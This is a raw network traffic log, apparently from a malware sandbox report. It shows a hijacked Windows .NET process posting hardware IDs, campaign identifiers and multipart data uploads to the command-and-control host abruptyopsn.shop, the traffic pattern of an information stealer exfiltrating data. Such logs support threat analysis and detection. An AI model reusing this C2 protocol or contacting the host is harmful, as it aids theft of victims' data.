2024-12-31 16:40:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: abruptyopsn.shop
2024-12-31 16:40:08 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--wcyjskajenao&j=
2024-12-31 16:40:08 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=llj239m6udj44ucbub03gunl2e; expires=Sat, 26 Apr 2025 10:26:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alhoXaJiCyOQNZi9%2FzLn9uuWKKF0%2B2U9A2p01mg6o38Di9UAA4HGRVNkM%2BTQRxtJqjlkFQn8AkHosdd45HY8hQAD5aYPEiHtu6pKAFgLgKPOuoxBY1xYxfC5Mg8O9RMdTZcF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5ac98e072a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1916&rtt_var=727&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3051&recv_bytes=954&delivery_rate=2242703&cwnd=213&unsent_bytes=0&cid=be80288eee4752e9&ts=463&x=0"
2024-12-31 16:40:08 UTC	248	IN	Data Raw: 32 64 34 34 0d 0a 58 46 37 69 55 71 77 68 77 54 31 4d 78 55 55 42 79 77 41 71 49 31 4e 76 62 53 50 4b 68 39 32 67 79 54 5a 62 4e 46 69 42 45 6e 73 6e 66 4a 52 77 6c 68 58 74 48 7a 2b 67 5a 7a 75 2f 63 6c 39 47 66 30 30 4d 52 2b 69 39 75 38 47 6c 52 54 34 59 65 76 64 2f 57 57 59 34 67 7a 37 66 52 4f 30 66 4b 62 31 6e 4f 35 42 37 43 45 59 39 54 56 63 42 72 2b 32 2f 77 61 56 55 4f 6c 38 33 38 58 34 59 4e 44 4b 46 4f 73 6c 43 70 56 77 67 71 43 42 6b 72 6d 46 41 54 54 6f 43 42 55 37 6f 71 2f 2f 46 73 78 52 68 46 68 58 6b 5a 68 6f 52 50 35 45 35 6a 6c 7a 74 52 6d 36 67 4b 79 50 78 49 6b 74 47 4d 51 4d 4c 52 36 48 76 74 63 69 74 56 54 39 65 4b 4f 68 30 45 7a 51 38 68 6a 76 44 53 37 46 52 4b 71 38 72 59 71 52 68 43 41 39 78 43 68 63 42 38 4b Data Ascii: 2d44XF7iUqwhwT1MxUUBywAqI1NvbSPKh92gyTZbNFiBEnsnfJRwlhXtHz+gZzu/cl9Gf00MR+i9u8GlRT4Yevd/WWY4gz7fRO0fKb1nO5B7CEY9TVcBr+2/waVUOl838X4YNDKFOslCpVwgqCBkrmFATToCBU7oq//FsxRhFhXkZhoRP5E5jlztRm6gKyPxIktGMQMLR6HvtcitVT9eKOh0EzQ8hjvDS7FRKq8rYqRhCA9xChcB8K
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 58 73 38 4b 68 46 4b 45 4d 33 38 33 5a 5a 49 58 4b 5a 63 4d 6c 50 34 77 64 75 72 79 74 74 72 47 46 48 52 6a 41 4e 48 55 36 6f 35 72 66 4b 72 31 34 32 57 54 58 74 65 68 34 32 4e 59 63 2f 79 55 75 6c 55 43 33 6e 61 53 4f 75 65 67 67 5a 63 53 30 66 51 71 76 78 73 74 50 72 53 33 64 50 65 75 52 38 57 57 5a 38 68 6a 37 50 54 71 4e 4e 4a 71 77 73 5a 72 74 70 51 55 77 38 44 51 4a 4c 70 2b 61 2f 78 61 46 65 4e 6c 77 2b 37 6e 30 66 50 6a 7a 41 66 6f 35 45 75 78 39 32 35 77 52 6d 75 57 56 45 56 33 4d 33 54 31 37 6d 2f 50 2f 46 70 78 52 68 46 6a 4c 6d 63 78 6f 31 4d 34 4d 34 78 56 47 6a 54 53 69 71 49 6e 47 76 5a 30 5a 4c 4d 68 38 46 54 36 37 6d 74 73 6d 69 55 54 35 53 65 71 30 77 48 69 5a 38 32 48 44 76 54 71 68 54 4a 4c 41 6e 49 37 59 73 55 51 45 32 41 55 38 5a 36 Data Ascii: Xs8KhFKEM383ZZIXKZcMlP4wduryttrGFHRjANHU6o5rfKr142WTXteh42NYc/yUulUC3naSOueggZcS0fQqvxstPrS3dPeuR8WWZ8hj7PTqNNJqwsZrtpQUw8DQJLp+a/xaFeNlw+7n0fPjzAfo5Eux925wRmuWVEV3M3T17m/P/FpxRhFjLmcxo1M4M4xVGjTSiqInGvZ0ZLMh8FT67mtsmiUT5Seq0wHiZ82HDvTqhTJLAnI7YsUQE2AU8Z6
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 72 47 6e 6c 52 49 71 4d 6f 57 52 51 2f 6c 44 50 45 41 5a 5a 63 49 4b 6b 67 64 65 6c 39 42 6c 68 78 43 67 4d 42 38 4b 57 79 77 36 4e 53 4b 31 6b 33 34 48 34 58 4d 54 6d 50 4f 4d 35 44 72 6c 6f 71 72 43 78 67 70 47 5a 61 53 7a 45 46 43 6b 43 69 37 2f 2b 4d 36 31 4d 68 46 6d 4b 6a 51 51 34 31 66 72 55 7a 77 45 32 6b 53 57 36 34 61 58 72 70 5a 55 51 42 61 55 30 43 53 61 33 67 73 4d 4f 68 57 6a 78 63 4e 75 74 2b 47 69 77 7a 68 44 44 43 53 36 6c 53 49 4b 4d 76 61 71 4a 70 54 6b 45 77 42 30 38 50 36 4f 4b 6e 67 76 4d 55 44 56 45 32 37 6e 39 62 43 7a 2b 4f 50 73 6c 56 34 30 42 67 76 6d 64 6b 70 53 49 51 41 54 30 45 44 30 71 69 34 62 2f 46 70 6c 45 36 55 54 6e 75 64 78 4d 77 4f 34 51 38 78 30 36 6c 58 79 6d 6a 49 6e 47 73 61 30 52 4e 63 55 4e 50 52 72 43 6c 35 34 Data Ascii: rGnlRIqMoWRQ/lDPEAZZcIKkgdel9BlhxCgMB8KWyw6NSK1k34H4XMTmPOM5DrloqrCxgpGZaSzEFCkCi7/+M61MhFmKjQQ41frUzwE2kSW64aXrpZUQBaU0CSa3gsMOhWjxcNut+GiwzhDDCS6lSIKMvaqJpTkEwB08P6OKngvMUDVE27n9bCz+OPslV40BgvmdkpSIQAT0ED0qi4b/FplE6UTnudxMwO4Q8x06lXymjInGsa0RNcUNPRrCl54
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 46 6d 4b 6a 65 52 41 73 4d 6f 34 35 77 30 57 72 57 43 43 71 4c 47 57 69 5a 55 39 48 50 41 55 43 52 4b 76 6b 75 38 69 35 56 7a 4a 63 4e 2b 6b 77 56 33 34 37 6d 48 43 57 41 34 52 54 42 37 63 38 63 62 38 69 56 77 38 6f 54 51 68 4e 36 4c 33 2f 77 61 52 64 4e 6c 34 79 37 48 38 64 4d 44 71 47 50 63 74 4d 71 55 30 6d 71 53 70 6f 70 6d 6c 61 51 54 77 4a 41 30 57 67 37 72 57 43 35 52 51 2b 54 6e 71 37 4d 43 77 7a 4d 34 41 7a 32 41 4f 38 45 54 66 6e 49 47 2f 70 4f 67 68 4e 50 77 30 41 54 61 54 75 74 38 4f 6e 57 6a 35 54 4d 2b 74 34 43 7a 38 34 69 44 48 41 54 4b 4a 62 4b 36 49 6a 5a 4b 31 6b 52 77 46 2f 54 51 68 5a 36 4c 33 2f 37 59 78 68 65 33 63 41 6f 32 39 58 4a 33 79 48 50 49 34 62 34 31 4d 74 71 79 39 73 72 32 74 45 53 7a 67 47 41 30 71 73 36 62 62 48 72 56 55 Data Ascii: FmKjeRAsMo45w0WrWCCqLGWiZU9HPAUCRKvku8i5VzJcN+kwV347mHCWA4RTB7c8cb8iVw8oTQhN6L3/waRdNl4y7H8dMDqGPctMqU0mqSpopmlaQTwJA0Wg7rWC5RQ+Tnq7MCwzM4Az2AO8ETfnIG/pOghNPw0ATaTut8OnWj5TM+t4Cz84iDHATKJbK6IjZK1kRwF/TQhZ6L3/7Yxhe3cAo29XJ3yHPI4b41Mtqy9sr2tESzgGA0qs6bbHrVU
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 58 63 51 4c 44 4b 4e 50 38 5a 4c 71 6c 34 71 6f 69 70 6c 70 57 68 4a 52 6a 38 44 42 77 48 6d 70 62 6a 61 36 77 78 35 64 79 72 34 59 67 38 7a 48 59 30 2f 6a 6c 7a 74 52 6d 36 67 4b 79 50 78 49 6b 46 54 4e 51 41 64 53 4b 2f 72 73 4d 47 35 56 54 52 64 4b 4f 52 2f 48 54 6b 77 68 6a 2f 49 51 71 5a 56 49 71 41 69 61 4b 5a 75 43 41 39 78 43 68 63 42 38 4b 57 52 79 62 68 44 4f 6c 67 78 39 57 74 5a 49 58 4b 5a 63 4d 6c 50 34 77 64 75 70 43 78 6f 72 57 4a 45 51 54 55 41 44 31 4f 6e 34 72 6a 4c 6f 45 59 7a 55 54 33 6f 65 42 49 78 4f 70 49 38 77 46 47 6d 54 54 7a 6e 61 53 4f 75 65 67 67 5a 63 54 73 49 55 62 6a 6d 2f 66 4f 39 56 79 39 64 4e 2b 38 77 42 6e 41 6c 77 44 66 43 41 2f 73 66 4b 4b 67 75 59 4b 5a 6a 51 55 30 38 43 41 5a 45 71 65 4f 37 79 4b 46 55 50 31 41 37 Data Ascii: XcQLDKNP8ZLql4qoiplpWhJRj8DBwHmpbja6wx5dyr4Yg8zHY0/jlztRm6gKyPxIkFTNQAdSK/rsMG5VTRdKOR/HTkwhj/IQqZVIqAiaKZuCA9xChcB8KWRybhDOlgx9WtZIXKZcMlP4wdupCxorWJEQTUAD1On4rjLoEYzUT3oeBIxOpI8wFGmTTznaSOueggZcTsIUbjm/fO9Vy9dN+8wBnAlwDfCA/sfKKguYKZjQU08CAZEqeO7yKFUP1A7
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 34 37 6a 48 43 57 41 36 42 59 4c 61 59 74 61 71 56 74 54 30 55 6a 42 77 68 54 71 65 53 30 7a 36 64 55 4e 46 73 77 34 6e 6b 55 4d 6a 47 48 4e 38 46 47 34 78 46 75 6f 44 38 6a 38 53 4a 70 54 44 6f 42 56 42 76 6f 2b 76 48 62 36 31 4d 31 46 6d 4b 6a 63 42 4d 37 4e 6f 30 7a 77 55 43 78 58 69 69 31 4a 32 36 6a 63 45 4a 4b 4e 41 41 43 54 4b 76 6a 75 63 6d 6e 52 6a 42 57 4f 65 67 77 56 33 34 37 6d 48 43 57 41 34 42 49 4f 4b 30 67 62 37 39 70 53 55 49 6e 41 42 38 42 35 71 57 75 78 62 6f 55 59 55 41 71 39 48 63 47 63 43 58 41 4e 38 49 44 2b 78 38 6f 72 69 46 6b 72 32 78 61 52 44 63 43 41 45 69 68 34 62 66 42 71 31 41 39 55 54 2f 67 66 42 49 35 50 34 38 30 78 30 32 71 55 47 37 70 5a 32 53 78 49 68 41 42 45 42 59 4d 54 61 57 6c 6f 49 79 79 46 44 35 61 65 72 73 77 46 Data Ascii: 47jHCWA6BYLaYtaqVtT0UjBwhTqeS0z6dUNFsw4nkUMjGHN8FG4xFuoD8j8SJpTDoBVBvo+vHb61M1FmKjcBM7No0zwUCxXii1J26jcEJKNAACTKvjucmnRjBWOegwV347mHCWA4BIOK0gb79pSUInAB8B5qWuxboUYUAq9HcGcCXAN8ID+x8oriFkr2xaRDcCAEih4bfBq1A9UT/gfBI5P480x02qUG7pZ2SxIhABEBYMTaWloIyyFD5aerswF
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 37 32 45 61 6b 53 57 79 53 4a 47 32 6e 5a 56 34 42 4c 6a 4a 42 41 61 66 2f 2f 35 71 53 54 58 6c 52 4e 71 4d 6f 57 53 73 37 67 44 66 55 56 61 52 54 50 36 77 71 62 34 74 74 54 31 63 79 41 67 78 51 6f 61 6d 30 7a 2b 73 61 65 56 45 69 6f 79 68 5a 45 54 75 57 4d 2b 46 41 73 6c 5a 75 36 57 64 6b 76 79 49 51 41 51 39 4e 48 55 4b 34 35 72 44 54 6c 52 52 68 54 77 53 6a 65 77 38 35 4c 49 4d 6d 78 55 36 76 54 68 44 6e 66 7a 66 37 4d 42 6f 54 59 78 4a 50 58 70 65 72 2f 38 50 72 44 41 42 50 65 76 55 77 51 57 78 79 77 43 4b 4f 47 2b 4d 59 4c 62 55 31 5a 61 70 30 53 77 59 50 4d 79 68 58 6f 75 4b 76 78 62 78 62 65 52 68 36 37 44 42 42 42 33 79 4a 4e 39 56 53 74 56 49 2b 6f 47 64 63 35 79 4a 51 41 57 6c 4e 4f 6b 4b 6d 36 37 6a 55 75 68 6b 65 51 44 44 6b 59 42 34 70 4d 38 Data Ascii: 72EakSWySJG2nZV4BLjJBAaf//5qSTXlRNqMoWSs7gDfUVaRTP6wqb4ttT1cyAgxQoam0z+saeVEioyhZETuWM+FAslZu6WdkvyIQAQ9NHUK45rDTlRRhTwSjew85LIMmxU6vThDnfzf7MBoTYxJPXper/8PrDABPevUwQWxywCKOG+MYLbU1Zap0SwYPMyhXouKvxbxbeRh67DBBB3yJN9VStVI+oGdc5yJQAWlNOkKm67jUuhkeQDDkYB4pM8
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 71 46 4d 6f 71 6a 49 73 75 48 52 4c 56 7a 5a 42 42 31 43 6c 36 66 2f 39 35 52 51 68 46 6d 4b 6a 52 52 6f 77 4d 6f 63 6d 33 77 36 44 56 43 4b 6b 4b 32 4b 75 49 67 59 42 4e 30 31 58 45 75 61 6c 75 39 50 72 44 47 6b 45 59 62 59 6a 54 6d 35 75 6e 33 37 58 41 37 55 66 64 76 56 70 49 37 73 69 45 41 46 32 44 68 31 54 72 75 61 70 77 65 78 71 42 31 63 33 37 44 77 58 4e 54 79 48 49 4e 68 59 37 31 63 74 76 54 31 64 6c 30 6c 45 52 7a 59 58 43 45 65 4f 78 66 2b 4d 36 31 74 35 44 67 4f 6a 4f 46 6b 42 63 73 41 6f 6a 68 76 6a 61 69 32 70 4b 57 53 2f 63 77 56 70 45 6a 63 31 41 34 54 69 71 6f 43 66 55 79 6c 48 4d 65 35 38 57 58 42 38 68 6e 43 57 45 2b 30 66 4b 72 5a 6e 4f 2f 6b 77 45 78 52 69 57 6c 38 54 74 36 75 6d 67 72 30 55 59 51 52 30 6f 32 4a 5a 5a 6e 7a 48 4d 39 78 Data Ascii: qFMoqjIsuHRLVzZBB1Cl6f/95RQhFmKjRRowMocm3w6DVCKkK2KuIgYBN01XEualu9PrDGkEYbYjTm5un37XA7UfdvVpI7siEAF2Dh1TruapwexqB1c37DwXNTyHINhY71ctvT1dl0lERzYXCEeOxf+M61t5DgOjOFkBcsAojhvjai2pKWS/cwVpEjc1A4TiqoCfUylHMe58WXB8hnCWE+0fKrZnO/kwExRiWl8Tt6umgr0UYQR0o2JZZnzHM9x
2024-12-31 16:40:08 UTC	1369	IN	Data Raw: 4f 64 2f 49 2b 35 73 52 55 41 79 41 77 78 54 75 75 4f 38 31 4b 67 54 42 32 67 66 37 6e 30 63 4d 44 75 2b 44 75 39 4a 73 31 49 68 6f 47 56 44 72 6e 52 4c 66 77 38 36 48 6b 61 34 70 35 6e 42 76 56 64 35 47 48 72 37 4d 45 46 2b 48 59 6f 67 77 30 79 6b 48 51 36 67 4d 57 44 70 4c 41 68 46 63 56 56 50 5a 4b 58 6f 75 73 79 73 46 68 68 63 4b 75 35 2f 48 6e 77 63 68 79 62 4e 41 2b 30 66 49 75 64 2f 49 36 68 6f 57 45 77 2b 43 6b 4e 47 73 75 4c 2f 6a 4f 74 61 65 51 35 36 34 6e 6f 4a 4d 7a 4f 48 66 4d 68 4e 72 52 38 78 36 54 34 6a 76 79 49 51 45 6e 39 4e 48 51 48 77 70 66 6a 42 75 55 59 2f 56 53 7a 67 4e 79 63 41 45 5a 49 33 33 6b 44 68 62 69 4f 6a 4d 58 61 71 63 6b 39 2f 44 79 41 64 52 72 6a 6d 2f 66 4f 39 56 7a 6c 59 50 61 4d 2b 57 53 5a 38 32 48 44 6a 55 61 52 50 Data Ascii: Od/I+5sRUAyAwxTuuO81KgTB2gf7n0cMDu+Du9Js1IhoGVDrnRLfw86Hka4p5nBvVd5GHr7MEF+HYogw0ykHQ6gMWDpLAhFcVVPZKXousysFhhcKu5/HnwchybNA+0fIud/I6hoWEw+CkNGsuL/jOtaeQ564noJMzOHfMhNrR8x6T4jvyIQEn9NHQHwpfjBuUY/VSzgNycAEZI33kDhbiOjMXaqck9/DyAdRrjm/fO9VzlYPaM+WSZ82HDjUaRP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49988	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:09 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2MUNY1F2TDR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12824 Host: abruptyopsn.shop
2024-12-31 16:40:09 UTC	12824	OUT	Data Raw: 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 32 4d 55 4e 59 31 46 32 54 44 Data Ascii: --2MUNY1F2TDRContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--2MUNY1F2TDRContent-Disposition: form-data; name="pid"2--2MUNY1F2TDRContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--2MUNY1F2TD
2024-12-31 16:40:10 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8fh1r6u90lqkbd46o4sqtibpep; expires=Sat, 26 Apr 2025 10:26:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2B6jqt7aAw80pxAuki5eITdn9m%2BJmJx2pY0mFqTXcDEjJjbSmkY1DjaIM2BK3%2BqyMMIvh8PCrULpWWjuKdl1p9UvfvZkjLuhwaDpJ1mr9r33ZraOOuSg2jrqj9d5%2FqECXeW5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5b3cad7de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1655&rtt_var=643&sent=10&recv=17&lost=0&retrans=0&sent_bytes=3053&recv_bytes=13757&delivery_rate=2510028&cwnd=210&unsent_bytes=0&cid=59ff50afc24601da&ts=508&x=0"
2024-12-31 16:40:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:40:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49989	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:10 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4Z5YHEY2O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15058 Host: abruptyopsn.shop
2024-12-31 16:40:10 UTC	15058	OUT	Data Raw: 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 34 5a 35 59 48 45 59 32 4f 0d 0a 43 6f 6e 74 65 Data Ascii: --4Z5YHEY2OContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--4Z5YHEY2OContent-Disposition: form-data; name="pid"2--4Z5YHEY2OContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--4Z5YHEY2OConte
2024-12-31 16:40:11 UTC	1137	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lcv0lbeuctdvlr2vl0o4mc26o6; expires=Sat, 26 Apr 2025 10:26:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FpHr8fNpY%2BZAmfgeIFTtC%2B0aZyMvx12e%2FXqCAH%2BWa2qPjRIybkH3%2F7BaWpofgxxYCDOhrDO%2FK8j%2FiriCutNY4urbaO7J7jsoPRDvw8mMNATqJF%2FOJ2h59jW3gPhbMIJXmeug"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5bb78fe4363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7383&min_rtt=1637&rtt_var=4179&sent=9&recv=18&lost=0&retrans=0&sent_bytes=3052&recv_bytes=15989&delivery_rate=2675626&cwnd=239&unsent_bytes=0&cid=e7f2e2a59b28f438&ts=530&x=0"
2024-12-31 16:40:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:40:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49990	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:11 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=AHFIYDV7YKGV8G User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19946 Host: abruptyopsn.shop
2024-12-31 16:40:11 UTC	15331	OUT	Data Raw: 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 48 46 49 59 44 56 37 59 4b 47 56 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a 2d 2d 41 Data Ascii: --AHFIYDV7YKGV8GContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--AHFIYDV7YKGV8GContent-Disposition: form-data; name="pid"3--AHFIYDV7YKGV8GContent-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao--A
2024-12-31 16:40:11 UTC	4615	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-31 16:40:12 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lp1v5jsuov3s9clo6u401q4n5e; expires=Sat, 26 Apr 2025 10:26:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7BTpj%2FL4AaSC%2BqvQO0LKRNLUS42cxduo%2FCFWDFQJ2HSIcBGiSz%2BNcoaLhWMIaeeb3NqgNgiKI6r8QLTP5U8VYMTR7xSnJo5OW21ye0EtbaPM6R4z29FfzWz7MfYZJ1arQP27"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5c2fb8172a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: 